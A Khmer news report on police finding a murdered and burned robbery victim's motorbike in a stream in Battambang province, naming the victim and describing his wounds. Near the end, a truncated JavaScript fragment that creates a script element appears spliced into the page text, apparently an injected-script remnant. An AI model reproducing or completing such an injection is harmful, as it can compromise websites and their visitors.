Leng Navatra – Sidebar Out Left
Leng Navatra – Banner Out Right

សមត្ថកិច្ចប្រទះឃើញម៉ូតូជនរងគ្រោះដែលចោរប្លន់ចាក់វាយសម្លាប់និងដុតសពនៅស្រុកភ្នំព្រឹកហើយ គឺយកទៅផ្លុងចោលនៅក្នុងទឹកអូរ

បាត់ដំបង៖ម៉ូតូជនរងគ្រោះម៉ាកMSXពណ៌ក្រហមដែលចោរប្លន់វាយចាក់សម្លាប់ម្ចាស់និងដុតសពចោលនោះ ត្រូវបានសមតក្ថកិច្ចប្រទះឃើញ ត្រង់ចំណុចទំនប់អូរកប់ផ្កាស្លា នៅចម្ងាយពីទីរួមស្រុកបាណន់ប្រហែល២គីឡូម៉ែត្រ ស្ថិតក្នុងភូមិបុស្សខ្នុរ ឃុំចែងមានជ័យ ស្រុកបាណន់ ខេត្តបាត់ដំបង កាលពីវេលាម៉ោង១០ព្រឹកថ្ងៃទី២៩ ខែវិច្ឆិកា ឆ្នាំ២០១៦។

សមត្ថកិច្ចដាក់ការសង្ស័យថាចោរប្លន់ជិះយកទៅផ្លុងចោល រឺដួលធ្លាក់ពីទំនប់អូរចូលក្នុងទឹក នៅពេលជិះគេចពីការតាមប្រម៉ាញ់របស់សមត្ថកិច្ច។

យ៉ាងណាក៏ដោយ សមត្ថកិច្ចនៅតែតាមស្វែងរកមុខសញ្ញាក្រុមចោរប្លន់ទាំងនោះហើយសមត្ថកិច្ចក៏បានចុះរាវរកក្រុមចោរប្លន់ក្នុងទឹកអូរក្រែងពួកវាជិះធ្លាក់ចូលអូរស្លាប់។តែការតាមចាប់ខ្លួនចោរប្លន់សម្លាប់យកម៉ូតូជនរងគ្រោះនៅស្រុកភ្នំព្រឹកនៅមិនទាន់លទ្ធផលនៅឡើង ។

គួររំលឹកថា នៅវេលាម៉ោង៨និង២០នាទីយប់ថ្ងៃទី២៧ ខែវិច្ឆិកាឆ្នាំ២០១៦នៅចំណុចរោងចំការស្ថិតក្នុងភូមិភ្នំតូច  ឃុំពេជ្រចិន្តា ស្រុកភ្នំព្រឹក ខេត្តបាត់ដំបង មានករណីឃាតកម្មបង្កដោយជនសង្ស័យមិនស្គាល់អត្តសញ្ញាណប្រមាណមួយក្រុមបានធ្វើសកម្មភាពវាយ និងចាក់ជនរងគ្រោះ បណ្តាលឲ្យស្លាប់.រួចអូសសាកសពជនរងគ្រោះយកទៅដុតក្នុងពំនូកចំបើងដែលនៅក្បែរនោះដើម្បីបំបាត់ភស្តុតាង។

 សមត្ថកិច្ចបានអោយដឹងថាសពដែលគេអូសចូលគំនរចំបើង ហើយដុតភ្លើងបំផ្លាញចោលនោះ មានឈ្មោះសុខ វណ្ណថា ភេទប្រុស អាយុ២០ឆ្នាំ រស់នៅភូមិកណ្តឹង ឃុំអូររំដួល ស្រុកភ្នំព្រឹក ខេត្តបាត់ដំបង។ ដោយលើខ្លួនសាកសពមានស្នាមចាក់នឹងទុលរឺវីស ច្រើនកន្លែង និងចាក់លើភ្នែកផងដែរ។

 ចំពោះករណីនេះសមត្ថកិច្ចបន្ថែមថាជាការប្លន់សម្លាប់ យកម៉ូតូមួយគ្រឿងម៉ាក MSX មិនមាស្លាកលេខដោយជនសង្ស័យមានគ្នា២ទៅ៣នាក់ ទំនងជាមនុស្សស្គាល់គ្នា។ នៅក្នុងករណីនេះដែរសមត្ថកិច្ចយើងបានសន្និដ្ឋានថា ជនរងគ្រោះនិងជនសង្ស័យចូលទៅជក់ថ្នាំញៀនជាមួយគ្នា ដោយនៅម្តុំកើតហេតុសមត្ថកិច្ចរកឃើញសំភារថ្នាំញៀនមួយចំនួន។

img-20161129-wa0112var d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More